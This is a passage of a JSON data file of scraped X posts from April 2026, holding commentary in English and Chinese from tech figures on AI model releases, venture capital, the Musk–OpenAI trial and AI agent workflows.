"handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", + "url": "https://x.com/jason/status/2049254554550653047", + "published_at": "2026-04-28T22:28:53+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", + "url": "https://x.com/berryxia/status/2049254052840812960", + "published_at": "2026-04-28T22:26:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", + "url": "https://x.com/berryxia/status/2049253021159403786", + "published_at": "2026-04-28T22:22:48+00:00", + "source": "nitter", + "title_zh": "NVIDIA推出Nemotron 3 Nano Omni多模态开源模型,集成语言、视觉、语音等五种模态处理能力,参数达300亿,支持超长上下文(256,000字),专为代理系统设计,权重、数据及训练方案全开源,并通过NIM API提供免费试用。" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": "2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", + "url": "https://x.com/berryxia/status/2049252532015579248", + "published_at": "2026-04-28T22:20:51+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: huggingface.co/poolside/Lagu…", + "url": "https://x.com/berryxia/status/2049250788422353142", + "published_at": "2026-04-28T22:13:55+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", + "url": "https://x.com/berryxia/status/2049250710492160228", + "published_at": "2026-04-28T22:13:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", + "url": "https://x.com/berryxia/status/2049249868376604931", + "published_at": "2026-04-28T22:10:16+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加入 Blender Development Fund,支持开源 3D 软件发展\n\n创意工作者和 3D/设计/音乐/视频玩家,这波更新太香了!", + "url": "https://x.com/berryxia/status/2049247904536428805", + "published_at": "2026-04-28T22:02:28+00:00", + "source": "nitter", + "title_zh": "Anthropic推出Claude与Blender、Autodesk Fusion等创意工具深度整合,实现3D场景调试、模型修改及建模工具自定义开发,同时加入Blender开发基金支持开源生态,为数字内容创作者优化跨平台工作流。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Wow. Musk’s lawyers will capitalize on this.", + "url": "https://x.com/GaryMarcus/status/2049243836359254025", + "published_at": "2026-04-28T21:46:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", + "url": "https://x.com/GaryMarcus/status/2049243406380237116", + "published_at": "2026-04-28T21:44:35+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Image", + "url": "https://x.com/sama/status/2049241518540808440", + "published_at": "2026-04-28T21:37:05+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", + "url": "https://x.com/sama/status/2049235284655780000", + "published_at": "2026-04-28T21:12:19+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is not that LLMs are useless or unintelligent but that they think differently from humans, lacking explicit knowledge of reality and instead amalgamating billions of statistical generalizations. https://open.substack.com/pub/garymarcus/p/chatgpts-powerful-new-image-engine?utm_campaign=post-expanded-share&utm_medium=web", + "url": "https://x.com/GaryMarcus/status/2049233910266278250", + "published_at": "2026-04-28T21:06:51+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", + "url": "https://x.com/paulg/status/2049226946471489602", + "published_at": "2026-04-28T20:39:11+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "There are some real bombshells in this one.", + "url": "https://x.com/paulg/status/2049226128603172949", + "published_at": "2026-04-28T20:35:56+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", + "url": "https://x.com/paulg/status/2049225204132421727", + "published_at": "2026-04-28T20:32:16+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2049223746368483370", + "published_at": "2026-04-28T20:26:28+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“YouTube videos about AI, but with no soyface”", + "url": "https://x.com/pmarca/status/2049222212008206717", + "published_at": "2026-04-28T20:20:22+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", + "url": "https://x.com/jason/status/2049216863574364182", + "published_at": "2026-04-28T19:59:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", + "url": "https://x.com/jason/status/2049216735912329567", + "published_at": "2026-04-28T19:58:37+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", + "url": "https://x.com/jason/status/2049215999795138656", + "published_at": "2026-04-28T19:55:41+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", + "url": "https://x.com/jason/status/2049215583351341460", + "published_at": "2026-04-28T19:54:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "AutoLane is my next uber.", + "url": "https://x.com/jason/status/2049215140810072429", + "published_at": "2026-04-28T19:52:16+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", + "url": "https://x.com/jason/status/2049215070970814469", + "published_at": "2026-04-28T19:52:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", + "url": "https://x.com/jason/status/2049214864912978399", + "published_at": "2026-04-28T19:51:11+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", + "url": "https://x.com/charliebilello/status/2049214106352107778", + "published_at": "2026-04-28T19:48:10+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂", + "url": "https://x.com/runes_leo/status/2049209546091253870", + "published_at": "2026-04-28T19:30:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.", + "url": "https://x.com/GaryMarcus/status/2049202338209079574", + "published_at": "2026-04-28T19:01:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": ".@ZohranKMamdani is about to kill the Golden Goose", + "url": "https://x.com/jason/status/2049200471651353064", + "published_at": "2026-04-28T18:53:59+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓\n\n话不多说,看图。提示词见引用文章。", + "url": "https://x.com/Pluvio9yte/status/2049197606619017697", + "published_at": "2026-04-28T18:42:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "might not be accurate for much longer...", + "url": "https://x.com/jason/status/2049195328092471563", + "published_at": "2026-04-28T18:33:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The Best Founders are Not Motivated by Money:\n\n\"Founders don't tend to be motivated by money as well.\nThe best are motivated by personal growth development, being inspired, finding things intellectually stimulating, and winning.\n\nBut it never tends to be money. Money is a very tough thing to be continuously motivated by.\n\nEventually, you will reach a point where money's no longer a motivator and then you need to find something else.\"\n\nLove to hear your thoughts on this @rabois @howard @dafrankel @alanchanguk @awxjack", + "url": "https://x.com/HarryStebbings/status/2049193932144164986", + "published_at": "2026-04-28T18:28:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", + "url": "https://x.com/pmarca/status/2049193915249574141", + "published_at": "2026-04-28T18:27:56+00:00", + "source": "nitter", + "title_zh": "\"研究发现,AI发展已超越冰冷机器范畴,成为人类文明知识与文化的镜像,引发深度情感认同。\"" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases?", + "url": "https://x.com/pmarca/status/2049193427120603173", + "published_at": "2026-04-28T18:25:59+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Looks like we've successfully ragebaited the CCP 🫠", + "url": "https://x.com/jason/status/2049191806135324774", + "published_at": "2026-04-28T18:19:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Asking AI to ask questions is hugely underrated.", + "url": "https://x.com/pmarca/status/2049188549342138449", + "published_at": "2026-04-28T18:06:36+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "American Intelligence", + "url": "https://x.com/pmarca/status/2049188427921334606", + "published_at": "2026-04-28T18:06:07+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Found the AI killer app.", + "url": "https://x.com/pmarca/status/2049183253764936068", + "published_at": "2026-04-28T17:45:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Google, 2001: Don’t Be Evil\nGoogle, 2026: How much does mass surveillance pay?", + "url": "https://x.com/GaryMarcus/status/2049171957250207936", + "published_at": "2026-04-28T17:00:41+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: They were saying that AI was going to enable time travel, and quite frankly, it truly did! It transported us all straight to 1984.", + "url": "https://x.com/GaryMarcus/status/2049166017138692254", + "published_at": "2026-04-28T16:37:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: “Sam Altman comes from the Zuckerberg school of business: give dumb people access to your tools, study them and, like the Borg, steal every innovation they have.” - @Jason \n\nthey're not just studying the models. they're studying you.", + "url": "https://x.com/jason/status/2049164438989672648", + "published_at": "2026-04-28T16:30:48+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "honestly, one of the worst things this nation has ever done to itself.", + "url": "https://x.com/GaryMarcus/status/2049161039665848492", + "published_at": "2026-04-28T16:17:18+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "当我听说AI博主赚钱,我去做了,发现也不是那样\n\n当我听说知识付费赚钱,我也去做了,发现也不是很赚钱\n\n当我听说线下开课挺赚钱的,中午吃饭被点醒了,我应该去做啥", + "url": "https://x.com/GoSailGlobal/status/2049157687766663643", + "published_at": "2026-04-28T16:03:58+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Talking AI with @MarioNawfal momentarily\n\n (9am PT; link info will be at his pinned tweet, or view on YouTube).", + "url": "https://x.com/GaryMarcus/status/2049156171463110746", + "published_at": "2026-04-28T15:57:57+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "最赚钱的莫过于,帮别人开Claude被封全额退款再抽个20%的水\n难怪A/那么多人用,原来是全民退款流", + "url": "https://x.com/realNyarime/status/2049154953483370544", + "published_at": "2026-04-28T15:53:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I spent the last 2 months trying to prevent this. If OpenAI offered a fig leaf, Google said \"imagine we offered a fig leaf.\"\n\nGoogle affirms it can't veto usage, commits to modify safety filters at government request, & aspirational language with no legal restrictions.\n\nShameful.", + "url": "https://x.com/GaryMarcus/status/2049153749743264231", + "published_at": "2026-04-28T15:48:20+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "那我也得查下拉\n\n英国公司 Mark", + "url": "https://x.com/GoSailGlobal/status/2049153253464490431", + "published_at": "2026-04-28T15:46:21+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Integrating Starlink with @TMobile’s 5G network will provide reliable, high-speed broadband for millions of businesses, including those in rural and remote locations across the country 🛰️❤️", + "url": "https://x.com/elonmusk/status/2049151577597112419", + "published_at": "2026-04-28T15:39:42+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Actually Smart Summon now reacts a lot faster", + "url": "https://x.com/elonmusk/status/2049150833422647689", + "published_at": "2026-04-28T15:36:44+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why investors need to give CEOs better comp packages:\n\n\"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap.\n\nFor the life of the company, I had only taken equity. I had taken no compensation. At the bottom in 22, I made a decision and that was for the first time to ask for compensation.\n\nI felt like I'm public. Turning this company around is a big task, and I'd like to align myself with investors to say, I'm gonna get paid, but I'm only gonna get paid if the stock recovers.\n\nIn order for me to get paid anything, the stock had to clear a certain price.\n\nCEOs who are founders originally started a business taking really big risk. If the belief is that the CEO should then never get compensation ever again, it's completely flawed logic.\" Adam Foroughi, @AppLovin\n\nWhat are your single biggest lessons/advice on this @vkhosla @bhalligan @infoarbitrage @taavet @elonmusk?", + "url": "https://x.com/HarryStebbings/status/2049145110491967672", + "published_at": "2026-04-28T15:14:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 